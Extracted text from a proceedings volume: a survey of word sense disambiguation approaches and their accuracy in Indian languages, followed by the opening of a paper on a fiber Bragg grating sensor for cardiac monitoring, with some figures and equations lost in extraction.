© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 693
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_56
694 A. S. Maurya and P. Bahadur
WSD is the selection process for the exact suggestion of an ambiguous word existing
in this situation.
The ambiguity issue is the open challenge in the natural language processing
(NLP) field, and WSD is the important task to solve this issue. WSD is a crucial task
for several real-life applications like machinery translation (MT), data extraction
(DE), information recovery (IR), and voice recognition (SR).
Machine translation (MT) has been one of the most significant applications of WSD
techniques. Machine translation [1] is a process whereby a language is converted into
another language. The first language is alluded to as the source language, while the
subsequent language is alluded to as the objective language. Common dialects appear
as composed writings and discourse information. This content or vocal information
can be interpreted from the base language to the objective language utilizing machine
translation (MT).
Ambiguity refers to the presence of these words in every sentence that has more than
one meaning or interpretation. By studying various works on ambiguity, we have
found that ambiguity in language can be classified into five broad categories which
is designed in Fig. 1.
Detailed information on the various types of ambiguities with its example and
explanation is outlined in the Table 1.
Ambiguity
Types
Applications of dis-
ambiguation tech-
NP VP NP VP
Train Train
VPP NP NP NP
2 pm leaves
VP PP PP VP
leaves at at ???
Word sense disambiguation (WSD) is the work of segregating, by thinking about its
unique situation, the best feeling of an uncertain word (a word with different impli-
cations) in a particular utilization of that word. WSD is viewed as an AI-complete
test, a task whose arrangement must be in any event as perplexing as man-made
consciousness’s most requesting issue [Navigli]. This issue subsequently is tackled
during the interpretation from the source language to the objective language. The
technique for finding the specific significance of an equivocal word [5, 6] from a
predefined set of faculties is word sense disambiguation (WSD).
696 A. S. Maurya and P. Bahadur
Table 1 (continued)
S. No. Ambiguity types Definition Example Explanation
5 Parts-of-speech In such uncertainty, Example: “The red In example, in the
(POS) ambiguity the similar type of a leaves are very first phrase the word
word can be a thing shiny” and “The “leaves” means
or an action word, train leaves at 2 “leaves of a tree”,
plural or solitary, and p.m.” which is a name, and
so on [4] in the second phrase,
“leaves” means
“leaving a train,”
which is a verb. This
means that these
words can be labeled
as different parts of
the discourse in
different phrases
The remainder part of the paper is organized from Sects. 3–8 as follows:
698 A. S. Maurya and P. Bahadur
Section 3: This section provides a relative analysis WSD and instructions for
future research.
Section 4: In this section, our proposed work is described.
Section 5: The different approaches of WSD are discussed in detail. Section 5 also
contains the comparison table for different WSD approaches with their benefits
and drawbacks in Table 2.
Section 6: This section presented the summary of WSD approaches and
algorithms with its benefits and drawbacks in Table 2.
Section 7: The review of literature of different WSD approaches used by
researchers in various Indian languages is described here and their comparative
analysis is also presented in Table 3 along with its result accuracy percentage.
Section 8: This section contains the conclusion of the paper.
There is a lot of work done on WSD; some provide the precision of numerous strate-
gies used in different languages, and few give WSD approach surveys. On the basis
of the techniques used, different sources of knowledge used in the disambiguation
classification of WSD algorithms are given [8]. The WSD surveys were conducted
by various researchers and a comprehensive report on algorithms and methods to
solve the problem of uncertainty in a particular language few literature analysis on
WSD based work done by the investigators, their conclusion along with scope for
upcoming researches in details is presented below:
(a) A new algorithm Novel context clustering scheme is presented in the Bayesian
framework. This algorithm is based on the similarities between context pairs.
After that Maximum Entropy model is trained to represent the probability
distribution of context pairs similarities based on heterogeneous features [9].
(b) Naïve Bayesian method of supervised learning approach with high features.
A Forward Sequential Selection algorithm is used to choose the best set of
features. High accuracy obtained by using this method. Part-of-speech can be
checked to determine whether it is useful in the case when we do not have full
enough training data [10].
(c) Hybrid training method is used for better performance over supervised and
unsupervised approach. They found the result that unsupervised method gives
63%, supervised method gives 76% and hybrid method gives 80% accuracy
result. Therefore, they conclude that accuracy is improved in a hybrid approach.
They also said that if the number of target word is disambiguated correctly,
then the system gives 100% accuracy result [11].
(d) Unsupervised Graph-based Approach is used. After processing of the sentence,
it finds the ambiguous words and creates a virtual graph on vectors. From
the labeled nodes of the graph similarity can be calculated. On the basis of
A Detailed Analysis of Word Sense Disambiguation Algorithms … 699
Table 2 Comparison analysis of WSD algorithms and approaches with respect to its benefits and
drawbacks
Approach Algorithm Benefits Drawbacks
Knowledge-based Lesk algorithm The improved Lesk It requires massive
approach algorithm has the knowledge of sources
advantage of being much and original method
quicker than the original cannot be used basically
Lesk algorithm and
having a lower
computational complexity
Semantic The smallest distance When the uniform
similarity between two words are distance problem arises,
semantically related it implies that any two
concepts of the same
paths will have the same
semantic similarity
Preferences for Reduce heavy human The grammatical
selection time cost for manual relationship between
tagging selected words or
phrases can be hard to
establish
Heuristic method Potential issues can It requires knowledge
examine after conducting as well as experiences.
usability testing It is also more
expensive for designers
Supervised approach Decision list This approach produces Over fitting problem
the best results since it occurs it means that
can be used in a series of error appears when a
experiments to arrive at function is too
the desired outcome closely acceptable to a
limited set of data
points
Decision tree Effective method and Maintenance is more
easy to understand complicated and
difficult task
Naïve Bayes’ This is a very simple Problem occurs due to
method and easy to the lack of data
implement. It is also very
fast and requires less
amount of training data
and calculate probability
likelihood
Neural network Ability to work with This method is
incomplete knowledge hardware dependent
and also requires
parallel processing unit
(continued)
700 A. S. Maurya and P. Bahadur
Table 2 (continued)
Approach Algorithm Benefits Drawbacks
Example-based Develop a long-tern Poor potential
Method knowledge holding performance
system
Support vector It uses the kernel trick and Lack of transparency of
machine (SVM) due to the regularization result
parameter over-fitting
problem can be reduced
Unsupervised Context It can be used without any The issue of selecting
approach clustering/word prior experience as a basis suitable document
clustering or developing corpora features to use in
clustering
Co-occurrence Robust features can be Bookmarks cannot be
graph generated by assembling included
small features
similarity value sense label can be selected. This is a new approach for Indian
languages. This new approach can be applied on Indian languages for better
accuracy and adaptability [12].
(e) For the purpose of disambiguation, the Topic Model is used. The most basic
example of a topic model is Latent Dirichlet Allocation (LDA). It is based on the
key hypothesis that the documents deal with a number of topics. Probabilistic
graphical model is presented. The system will use the entire document as
the framework for disambiguation since this model scales linearly with the
number of terms in the context. It runs a better WSD system based on the
leading knowledge on a set of Benchmark datasets. This model may be used
for the supervised WSB method [13].
(f) A detailed survey report presented on various WSD approaches and its benefits
and drawbacks. These approaches are implemented in many languages success-
fully. Finally, they can build a successful WSD algorithm by considering the
following factors: The neighbors of a word of the same meaning seem to be the
same. Some approaches are always run quickly, but with accuracy limitations,
and the majority of those approaches have been successfully implemented for
a variety of languages [14].
(g) Knowledge-based WSD approach is used and there are only four components of
the framework: finally Semantic path exploration, relation extraction, similarity
calculation and semantic space exploration are performed. On the other three
datasets, this method outperforms all other schemes. This method performs
well on nouns and verbs in terms of POS disambiguation. These nouns and
verbs are the main component of any sentence. The performance of noun disam-
biguation is equal to that of the best supervised method, and the performance
of verb disambiguation is superior to all other knowledge-based systems [15].
(h) The dynamic programming is used to solve by breaking the problem down into
a series of smaller problems, and dynamic programming (DP) is used to find
A Detailed Analysis of Word Sense Disambiguation Algorithms … 701
Table 3 Summary of WSD techniques used in different Indian languages with accuracy percentage
Used algorithm type Author Year WSD language Performance in %
Knowledge-based Haroon [38] 2010 Malayalam 81.3%
approach
Modified Lesk’s Kumar and 2011 Punjabi 75%
algorithm Khanna [39]
Unsupervised learning Das and Sarkar 2013 Bengali 60%
method with [40]
graph-based approach
Decision list Parameswarappa 2013 Kannada Satisfactory
et al. [41]
Genetic algorithm Kumari and Singh 2013 Hindi 91.6%
[42]
Decision tree based Sivaji et al. [27] 2014 Manipuri 71.75%
WSD system
Support vector machine Anand Kumar 2014 Tamil 91.6%
et al. [43]
Naïve Bayes Pal et al. [44] 2015 Bengali 80–85%
classification
Context similarity Sankar et al. [45] 2016 Malayalam 72%
unsupervised approach
Genetic algorithm Vaishnav [46] 2017 Gujarati Satisfactory
Lesk algorithm Shashank and 2017 Kannada Satisfactory
Kallimani [47]
Naïve Bayes method pal Singh and 2018 Punjabi 81%-89% for both
Kumar [48] model
Naïve Bayes approach Borah et al. [49] 2019 Assamese 91.11%
Knowledge-based Vaishnav and Sajja 2019 Gujarati Satisfactory
approach [50]
Deep learning neural pal Singh and 2020 Punjabi 91–97%
network Kumar[51]
the optimal subset that contains the most distinct set in the shortest amount of
time, while maintaining the same or better accuracy than the original set. This
algorithm can be used for any ensemble approach and real world examples and
it can even be combined with other ensemble methods like boosting. DPED can
even be integrated with bagging and boosting algorithms to enhance the
efficiency on big data sets and multi-classes [16].
(i) They create a conceptual system that bolstered the likelihood of events of occa-
sions of different nature and their potential effect. The conceptual analysis is
often applied in various other case studies consisting of multiple sources. As a
result, taking advantage of the sources is very difficult. A quantitative review
702 A. S. Maurya and P. Bahadur
technique will help to enhance it. Further advancement is justified by the asso-
ciation between both the size of acuity and taxonomy & management. Rele-
vant sources are often imagine by assigning weights to different interpretations
on the idea of scenario reliability [17].
(j) SENS EMBERT is an effective method in both English and other multilingual WSD
tasks. Going forward, they will work to cover PO tags (verbs, adjectives and
adverbs) by tapping into other sources of knowledge. Sense embeddings can
also be used to create high-quality silver data for WSD in multiple languages
[18].
(k) Word in Context (WiC) model is used for all. They presented ARES, the semi-
supervised approach for producing embedding of senses in English and across
different languages. ARES can couple the information within the sense anno-
tated corpora that automatically created by means of a cluster-based algorithm
and resulting in high-quality latent representations of the concepts within a
lexical knowledge base. Working forward they will exploit this information
obtained by the embedding to other downstream in multi-lingual semantics
and cross-lingual semantic parsing [19].
4 Proposed Work
We inferred from this comparative evaluation that we can apply such algorithms
in multiple languages on various different data sets. The size of the data set can
be different as well. There are very few Indian languages in which WSD experi-
ments implemented, such as Hindi, Marathi, Gujarati, Bengali, Punjabi, Kannada,
etc. Our approach would be providing a better result for solving parts-of-speech
(POS) ambiguity between an English-to-Sanskrit language [20] machine translation
using a supervised learning method.
Example
1. Train leaves at two p.m. (a verb)
2. Leaves are falling from the tree. (a noun)
The parse tree for the sentence “Train leaves at 2 pm” is presented in figure. It
will takes two cases.
The sentence is grammatically correct, but, while morphological analysis the
ambiguity will be in terms of treating “leaves” as noun or verb by the system due
to information provided by bilingual lexicon/dictionary. Morphological analysis is a
method for identification and investigation of the total set of all possible relationships
contained in a list and selection of most appropriate word from the entire possible
word list.
A Detailed Analysis of Word Sense Disambiguation Algorithms … 703
5 WSD Approaches
There are several approaches in WSD, but mainly three approaches that depend on
the availability of the dataset. These approaches are figures in Fig. 4.
This approach is based on the several sources of knowledge like machine readable
dictionaries, thesaurus, inventories etc. Commonly used dictionaries in this explo-
ration field is WordNet [21]. Normally, four main methods of information-based
approaches are popular.
(a) LESK Algorithm: The Lesk algorithm is the vocabulary-based method and
was introduced by Michael Lesk in 1986 [22, 23]. Which further means iden-
tifying the correct sense one word at a time. This algorithm determines the
correct definitions of all words in context by using idea overlap. It runs faster,
which reduces the computational time complexity.
(b) Semantic Similarity: This approach is based on the knowledge-based methods
and is used to resolving the WSD problem. This algorithm defines the relation-
ship between words [14]. Semantic similarity can be to quantify uncertainty,
as well as to check patterns for continuity and coherence [24]. Information
quality, features, path duration, and hybrid measures are the four categories
that all measures fall under.
(c) Selectional Preferences: This method is used to find the information regarding
potential relationships between different categories of words and also denotes
to the familiar sense on the basis of source of information. These partialities
are given in terms of semantic classes instead of a single word.
(d) Heuristic Method: This method comes under the knowledge-based methods.
To determine the correct meaning of an ambiguous expression, linguistic
properties are used. Three methods are used for estimation of WSD systems:
Most Frequent Sense searches for all possible meanings of a given ambiguous
expression. A word’s most frequent sense (MFS) can be measured in a variety
of ways. WordNet provides a frequency count for each of a word’s senses.
One Sense per Dialog says that a word’s meaning will be preserved through
all occurrences in any given text. It has an effect on classification likelihood,
and it can also be overridden if there are good local evidence. One sense per
Association estimate is similar to that of One Sense per Discourse estimation,
with the exception that it assumes that closer words offer stronger and clear
signals to the same word.
(e) Walker’s Algorithm: This algorithm is based on the thesaurus. This algorithm
works on finding the synonyms of ambiguous word and calculates the result
for each sense. It will add 1 if the meaning of the synonym is identical to the
word. This method gives the highest result because it relies on synonyms.
This method is applied for WSD systems that uses machine learning techniques to
learn from sense-annotated data that has been manually generated. After learning
from the training set results, the training set will be used to find the goal. The
target word tags are manually generated using the dictionary. In contrast to the other
methods, this one shows the best results. This approach uses the following methods:
(a) Decision List: The list created from “if-then-else” rules is a decision list [25–
27]. Training sets are used to generate new parameters like feature value, senses,
and score. On the basis of decreasing score, final order of rule is generated,
and results in the creation of decision list. First of all calculate the occurrences
of any word and its feature vector is used for the creation of decision list.
Example of Decision list to find a person is eligible for blood donation or not.
(b) Decision Tree: A decision tree is a visual representation for the outcomes of
a sequence of connected choices. It allows a person to compare and contrast
potential actions using a yes–no tree based on their various characteristics such
as costs, probabilities, and benefits. The representation of classification rules
is achieved using a decision tree [28–30], and these rules recursively distribute
the training data set.
Figure 5 shows an example of a decision tree used to determine a person’s
eligibility for blood donation.
The probability value P can be computed with the help of subsequent formula:
where S i is the sense of a word w, f j is the given feature and x the total number of
extracted features.
This model is simple to use, and implement, especially with large data sets.
(iv) Neural Networks: Artificial neurons are used to process data in this model
[34–37]. The training data set is partitioned into non-overlapping sets using
706 A. S. Maurya and P. Bahadur
this approach, with inputs in the form of pairs of features. The connection
weights that come from the new pairs are balanced to get the desired perfor-
mance. Words are interpreted as nodes in neural networks, these nodes trigger
semantically linked thoughts.
The following formula [38] can be used to calculate the input for the general
model of artificial neural network:
The result can be determine after using the stimulation function on the total
input value.
y = F(yim ) (6)
(v) Example-Based Learning: All examples will be stored in memory, and new
examples will be added to the model. The description of this memory will be
considered. In this model, the K-Nearest neighbor (KNN) method is widely
used. The KNN algorithm uses feature similarity to expect new data point
values and these data points will be assigned a new value on the basis of how
closely it is related to the point in the training set.
(vi) Support Vector Machine (SVM): The SVM centered methodology is
constructed on the mathematical learning theory concept of structural risk
minimization. The main objective of this strategy is to use a higher margin
to distinguish positive and negative cases. Margin is defined as the distance
between the hyperplane and the nearest positive or negative example. Both
forms of examples, which are the most similar to the hyperplane, are called
support vector.
According to [39] this algorithm does not necessarily require a training corpus or a
considerable computation time. Using this approach, we can easily get the unlabeled
data from the computer. Following 3 approaches comes under this category:
(a) Context Clustering: This method depends on the grouping techniques and
groups are represented on the basis of similarity matrix or context vectors.
These forms a group called clusters and clusters are used for the determination
A Detailed Analysis of Word Sense Disambiguation Algorithms … 707
of the meaning of a word. This technique can be applied when there is no class
to be predicted, but the inputs can be divided into natural groups.
(b) Word Clustering: In this techniques, words are clustered together on the basis
of their features of semantic similarities. The similarity of these words can be
calculated from the sharing features between them. Extremely similar words in
a category have the same sort of characteristics. Then on applying the clustering
algorithm distinction between senses can be determined.
(c) Co-occurrence Graph: This method is based on the graph. In this method,
virtual graph on vector can be created after finding the polysemous word from
the result of sentence processing. These nodes helps to calculate the similarity.
Then, the consistent value can be determined based on the measurements, and
the mark can be assigned based on the context.
After the detailed study of WSD approaches, we presented the summary of benefits
and drawbacks of different types of algorithms that are listed in Table 3.
Numerous works have been done for the implementation of disambiguation methods
for English to other European languages, but due to the lack of resources like machine
dictionaries, knowledge sources less work has been done in Indian languages. Such
resources are needed for WSD algorithms. The literature review of work carried out
in various Indian languages are presented here in a form of comparative analysis.
Table 4 contains the detailed analysis of several WSD algorithms applied in several
Indian languages, by various researchers, with reference to their result accuracy.
8 Conclusion
Due to the complexities of the words in the specific language and its dependence on
unorganized sources, disambiguation is a difficult task to capture the precise meaning
of a particular document. We have included a thorough analysis of the advantages and
disadvantages of different approaches to word sense disambiguation (WSD) in this
manuscript. We also discussed the different methods used by researchers in Indian
language machine translation research, as well as the accuracy of the findings. We
came to the conclusion that there are three methodologies: Regulated, unregulated,
708 A. S. Maurya and P. Bahadur
and information-based, with the controlled (supervised) approach providing the best
performance.
At last, we arrive at the determination that a specific system give significant degree
of precision for language, however, low for an extra, the elements of the pre-owned
informational collection influences the exhibition of the applied calculation, some of
these techniques are regularly run rapidly yet with imperatives of the exactness and
the vast majority of those strategies are executed for a few dialects effectively.
In our research work, we will apply supervised learning methods to disambiguate
the part-of-speech ambiguity in the source language, i.e., the English language during
machine translation from English to the Sanskrit language. We are focusing to trans-
late documents in source language, i.e., English into the target language, i.e., Sanskrit
with maximum success rate.
References
1. Bahadur, P., & Chauhan, D. S. (2014). Machine translation—A journey. In 2014 Science and
information conference (pp. 187–195). IEEE.
2. Dayal, V. (2004). The universal force of free choice any linguistic variation yearbook 4,
15–40. Retrieved from http//www.ingentaconnect.com; Cruse, D. (1986). Lexical semantics.
Introducing lexical relations. Cambridge: Cambridge University Press.
3. Cruse, D. (1986). Lexical semantics. Introducing lexical relations. Cambridge: Cambridge
University Press.
4. Zelta, E. N. (2014). Ambiguity. In Stanford encyclopedia of philosophy. Retrieved from http://
plato.stanford.edu; Navigli, R. (2009). Word sense disambiguation: A survey. ACM Computing
Surveys (CSUR), 10.
5. Navigli, R. (2009). Word sense disambiguation: A survey. ACM Computing Surveys (CSUR),
41(2), 1–69.
6. Lin, D., and Pantel, P. (2002). Discovering word senses from text. In ACM
7. Ranjan Pal, A., & Saha, D. (2015). Word sense disambiguation: A survey. International Journal
of Control Theory and Computer Modeling, 5(3), 1–16. https://doi.org/10.5121/ijctcm.2015.
5301
8. Haroon, R. P. (2011). Word sense disambiguation-A survey. In Proceedings of the international
colloquiums on computer electronics Electrical Mechanical and Civil, (EMC’ 11), ACEEE (pp
58–60). DOI: 02.CEMC.2011.01.582
9. Niu, C., Li, W., Srihari, R. K., Li, H., & Crist, L. (2004). Context clustering for word sense
disambiguation based on modeling pairwise context similarities. In Proceedings of SENSEVAL-
3, the third international workshop on the evaluation of systems for the semantic analysis of
text (pp. 187–190).
10. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features. In Proceedings of the 18th Pacific Asia conference on language, information and
computation (pp. 105–114).
11. Saktel, P., & Shrawankar, U. (2013). An improved approach for word ambiguity removal. arXiv
preprint arXiv:1304.7282.
12. Sheth, M., Popat, S., & Vyas, T. (2016). Word sense disambiguation for Indian languages. In
International conference on emerging research in computing, information, communication and
applications (pp. 583–593). Springer, Singapore.
13. Chaplot, D. S., & Salakhutdinov, R. (2018). Knowledge-based word sense disambiguation
using topic models. In Proceedings of the AAAI conference on artificial intelligence (Vol. 32,
No. 1).
A Detailed Analysis of Word Sense Disambiguation Algorithms … 709
14. Aliwy, A. H., & Taher, H. A. (2019). Word sense disambiguation: Survey study. Journal of
Computer Science. Accepted July 2019, Iraq.
15. Wang, Y., Wang, M., & Fujita, H. (2020). Word sense disambiguation: A comprehensive
knowledge exploitation framework. Knowledge-Based Systems, 190, 105030.
16. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107.
17. Gaudard, L., & Romerio, F. (2020). A conceptual framework to classify and manage risk,
uncertainty and ambiguity: An application to energy policy. Energies, 13(6), 1422.
18. Scarlini, B., Pasini, T., & Navigli, R. (2020). SensEmBERT: Context-enhanced sense embed-
dings for multilingual word sense disambiguation. In Proceedings of the AAAI conference on
artificial intelligence (Vol. 34, No. 05, pp. 8758–8765).
19. Scarlini, B., Pasini, T., & Navigli, R. (2020). With more contexts comes better performance:
Contextualized sense embeddings for all-round word sense disambiguation. In Proceedings
of the 2020 conference on Empirical Methods in Natural Language Processing (EMNLP)
(pp. 3528–3539).
20. Bahadur, P. (2013). English to Sanskrit machine translation-EtranS system. International
Journal of Computer Applications & Information Technology, 3(II) (ISSN: 2278–7720).
21. Banerjee, S., and Pedersen, T. (2002). An adapted Lesk algorithm for word sense disambigua-
tion using WordNet. In Proceedings of the third international conference on intelligent text
processing and computational linguistics, Mexico City, February.
22. Lesk, M. (1986). Automatic sense disambiguation using machine readable dictionaries: How
to tell a pine cone from an ice cream cone. In Proceedings of SIGDOC.
23. Jiang, J. J., & Conrath, D. W. (1997). Semantic similarity based on corpus statistics and lexical
taxonomy. In Proceedings of the 10th research on computational linguistics international
conference (pp. 19–33) 5–7 Aug, Taipei, Taiwan.
24. http://link.springer.com/article/10.1023/A%3A1002674829964#page-1
25. Parameswarappa, S., & Narayana, V. N. (2013). Kannada word sense disambiguation using
decision list. 2(3), 272–278
26. http://www.academia.edu/5135515/Decision_List_Algorithm_for_WSD_for_Telugu_NLP
27. Singh, R. L., Ghosh, K., Nongmeikapam, K., & Bandyopadhyay, S. (2014). A decision tree
based word sense disambiguation system in Manipuri language. Advanced Computing: An
International Journal (ACIJ), 5(4), 17–22.
28. http://wing.comp.nus.edu.sg/publications/theses/2011/low_wee_urop.pdf
29. http://www.d.umn.edu/~tpederse/Pubs/naacl01.pdf
30. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features. In PACLIC 18 (pp. 105–114), 8th–10th Dec 2004, Waseda University, Tokyo.
31. http://www.cs.upc.edu/~escudero/wsd/00-ecai.pdf
32. Aung, N. T. T., Soe, K. M., & Thein, N. L. (2011). A word sense disambiguation system
using Naïve Bayesian algorithm for Myanmar language. International Journal of Scientific &
Engineering Research, 2(9), 1–7.
33. http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.13.9418&rep=rep1&type=pdf
34. http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.154.3476&rep=rep1&type=pdf
35. http://www.aclweb.org/anthology/W02-1606
36. http://www.cs.cmu.edu/~maheshj/pubs/joshi+pedersen+maclin.iicai2005.pdf date:
14/05/2015
37. Erkan, G., & Radev, D. (2004). Lexrank: graph based lexical. Artificial Intelligence Research,
22, 457–479.
38. Haroon, R. P. (2010). Malayalam word sense disambiguation. In 2010 IEEE international
conference on computational intelligence and computing research (pp. 1–4). IEEE.
39. Kumar, R., & Khanna, R. (2011). Natural language engineering: The study of word sense
disambiguation in Punjabi. Research Cell: An International Journal of Engineering Sciences,
1, 230–238. ISSN: 2229–6913.
710 A. S. Maurya and P. Bahadur
40. Das, A., & Sarkar, S. (2013). Word sense disambiguation in Bengali applied to Bengali-Hindi
machine translation. In Proceedings of the 10th International Conference on Natural Language
Processing (ICON), Noida, India.
41. Parameswarappa, S., Narayana, V. N., & Yarowsky, D. (2013). Kannada word sense disam-
biguation using decision list. International Journal of Emerging Trends & Technology in
Computer Science (IJETTCS), 2(3), 272–278.
42. Kumari, S., & Singh, P. (2013). Optimized word sense disambiguation in Hindi using genetic
algorithm. International Journal of Research in Computrer & Communication Technology,
2(7), 445–449.
43. Anand Kumar, M., Rajendran, S., & Soman, K. P. (2014). Tamil word sense disambiguation
using support vector machines with rich features. International Journal of Applied Engineering
Research, 9(20), 7609–7620.
44. Pal, A. R., Saha, D., Naskar, S., & Dash, N. S. (2015). Word sense disambiguation in Bengali:
A lemmatized system increases the accuracy of the result. In 2015 IEEE 2nd international
conference on recent trends in information systems (ReTIS) (pp. 342–346). IEEE.
45. Sankar, K. S., Raj, P. R., & Jayan, V. (2016). Unsupervised approach to word sense
disambiguation in Malayalam. Procedia Technology, 24, 1507–1513.
46. Vaishnav, Z. B. (2017). Gujarati word sense disambiguation using genetic algorithm. Inter-
national Journal on Recent and Innovation Trends in Computing and Communication, 5(6),
635–639.
47. Shashank, N. S., & Kallimani, J. S. (2017). Word sense disambiguation of polysemy
words in kannada language. In 2017 International Conference on Advances in Computing,
Communications and Informatics (ICACCI) (pp. 641–644). IEEE.
48. pal Singh, V., & Kumar, P. (2018). Naive Bayes classifier for word sense disambiguation of
Punjabi language. Malaysian Journal of Computer Science, 31(3).
49. Borah, P. P., Talukdar, G., Baruah, A. (2019) WSD for assamese language. In J. Kalita, V. Balas,
S. Borah, & R. Pradhan (Eds.), Recent developments in machine learning and data analytics.
Advances in intelligent systems and computing (Vol. 740). Springer, Singapore. https://doi.org/
10.1007/978-981-13-1280-9_11
50. Vaishnav, Z. B., & Sajja, P. S. (2019). Knowledge-based approach for word sense disambigua-
tion using genetic algorithm for Gujarati. In Information and communication technology for
intelligent systems (pp. 485–494). Springer, Singapore.
51. pal Singh, V., & Kumar, P. (2020). Word sense disambiguation for Punjabi language using deep
learning techniques. Neural Computing and Applications, 32(8), 2963–2973.
Fiber Bragg Grating (FBG) Sensor
for the Monitoring of Cardiac
Parameters in Healthcare Facilities
Ambarish G. Mohapatra, Pradyumna Kumar Tripathy, Maitri Mohanty,
and Ashish Khanna
Abstract Fiber Bragg grating sensing technology provides a new look to the
healthcare monitoring system due to its spectral encoding capacity, dielectric prop-
erty, sensitivity, inert, nontoxic, resistive to the electromagnetic environment, self-
referencing, and low cost. This article presents a design and construction of an FBG
sensor for the monitoring of cardiac vibrations. A sensor element is designed by
depositing polydimethylsiloxane (PDMS) polymer on the FBG sensing element. The
elastic and thermal property of the sensor element is also discussed in this article.
The stress and strain distribution profile is addressed using finite element analysis
(FEA). Further, the bonding of the FBG sensor element is discussed in this article
with adequate design specifications. In addition to the FBG sensor design consid-
erations, the real-time acquisition of the cardiac signal is also experimented with in
this research work to validate the sensor performance. Finally, the architecture of a
cardiac monitoring approach by utilizing the Internet of things (IoT) and machine
learning (ML) is proposed in this article.
A. G. Mohapatra (B)
Department of Electronics and Instrumentation Engineering, Silicon Institute of Technology,
Bhubaneswar, Odisha, India
P. K. Tripathy
Department of Computer Science & Engineering, Silicon Institute of Technology, Bhubaneswar,
Odisha, India
M. Mohanty
SSC, Puri, Odisha, India
A. Khanna
Maharaja Agrasen Institute of Technology, Delhi, India
e-mail: ashishkhanna@mait.ac.in
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 711
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_57
712 A. G. Mohapatra et al.
1 Introduction
2 Literature Review
during respiration. In a similar context, Dziuda et al. describe signals obtained from
FBG strain sensor which is made up of polymethyl is placed inside a bed mattress.
A moving average filter is used to obtain RR and HR [2]. The sensor signal is
affected due to the motion of the chest and also influenced by the body position,
cough, and displacement of the bed. FBG sensors are passive sensors suitable for
various critical applications [3]. The total error of the system is less than 8. Similarly,
Fajkus et al. describe a non-invasive probe based on two FBGs encapsulated inside
polydimethylsiloxane (PDMS) and observed polymer increases the sensitivity of the
probe four times. The wavelength-division technique is used on the spectral division
of individual grating to measure RR, HR, and body temperature [4]. The relative error
of the RR is 3.9%, and body temp is 0.36%. Dziuda et al. present FBG is written on
an optical fiber which is placed inside a pneumatic cushion. Fabry Perot filter is used
to analyzing FBG signals to detect HR and RR in sensing interrogation technology
[5]. FBG allows dynamic 24.8 µs strain breathing and approximately 8.3 µs for
HR. The sensor gives a maximum of 14% relative error. Dziuda et al. describe an
FBG sensor as placed inside a pneumatic cushion. Moving average method is used
to detect HR and RR on the filtering of the FBG signal by Fabry Perot and spectrally
scanning filter [6]. 0–12.4 µs is induced on FBG sensing element for breath rate
and 8.3 µs induced for HR. The maximum relative error for the sensor is 12%. Wo
et al. [7] present that a pair FBGs is inscribed in Er-doped fiber. Respiration rate is
measured on the variation of the beat signal between dual polarization of the packed
fiber laser. De Jonckheere presents an FBG-based smart textile elongation of 0.1–5%
during breathing. Spectroscopic technique with OSA is to detect HR and RR [8].
Wehrle presents an FBG strain sensor placed inside a belt and used a fixed filter with
OSA is to detect respiratory frequency spectrum and ventilator movement. Silva
describes a single FBG sensor is located inside a polymeric foil to detect RR and HR
[9]. Bilinear technique is used by using a two bandpass filter in the digital domain
[10]. Elsarnagawy describes the FBG sensor as embedded into Nylon textile. Two
bandpass filters in the range 0.1–0.4 Hz for RR and 0.8–1.6 Hz for HR [11]. Dziuda
et al. present an FBG sensor that adheres to the Plexiglas plate 95×220×1.5 mm
placed inside a bed mattress [12]. A cut-off frequency of 60 Hz is used by a low-pass
filter to detect RR and HR. The above review on FBG sensors concludes that there
is plenty of space at the bottom level, i.e., the development of high precision passive
sensor element.
3 Background
The FBG sensor element works on the principle of light traveling inside the core of the
optical fiber. The wavelength of light traveling inside the FBG element is attenuated
by the external strain and temperature on the grating region. The fabrication of the
FBG sensor element and basic working principles is discussed in this section.
714 A. G. Mohapatra et al.
The fabrication of the FBG sensor element for the acquisition of cardiac vibrations
is performed by following an experimental procedure in the laboratory. Ultraviolet
ray is focused on an optical fiber to develop the grating in periodic structure in silica
fiber. It produces a periodic change of refractive index of photosensitive fibers of
optical fiber is called Bragg grating. Bragg grating is treated as a sensing element by
using multiplexing on several points along with the optical fiber during the designing
of a sensor. The type of grating depends on the photosensitivity mechanism on which
fringes are produced in the fiber. The working principle of FBG sensing devices is
discussed in the next section of the article.
Fiber Bragg grating sensor has introduced a modulated periodic refractive index
along the propagation axis of optical fiber [13, 14]. This periodic structure acts as
a highly wavelength selective reflection filter. When an intense laser light incidents
on a sensor, some amount of reflected light signals are combined to form a one
large reflection wavelength called Bragg wavelength, and the condition is called
Bragg condition as shown in Fig. 1 [15, 16]. The Bragg wavelength is represented
according to coupling theory as Eq. 1.
λ B = 2ηeff (1)
where
ηeff is the refractive index of the fiber core.
is the grating period.
The reflected wavelength shift is dependent on both the strain and temperature
[17]. From the above equations, if the fiber Bragg grating material is chosen for the
design of the sensor, then strain sensitivity coefficient and temperature sensitivity
coefficient are used for sensing [7, 17].
The FEA model of the sensor element is designed in the COMSOL multiphysics soft-
ware, and the complete structural analysis is also performed. Simulation of various
designs involved in coupled physics, mechanics, acoustics, EM, fluid flow, heat
transfer, chemical reactions, etc., is carried out by using COMSOL multiphysics
software and preparation of easy apps.
The following analysis is performed using the COMSOL software.
• Single-physics and arbitrary multiphysics analyses.
• High-performance meshing and numerical analysis.
• Post-processing of the sensor structure.
The different analyses performed on the sensor element are shown in Figs. 2, 3, 4,
and 5. The 3D structure designed using the FEA software is shown in Fig. 2a. The size,
material, and other design considerations used in the FEA model are listed in Tables 1
and 2. Similarly, the 3D meshing of the FEA model is shown in Fig. 2b. Further, the
Fig. 2 3D model and 3D meshing of the polymer layer embedded on the FBG element
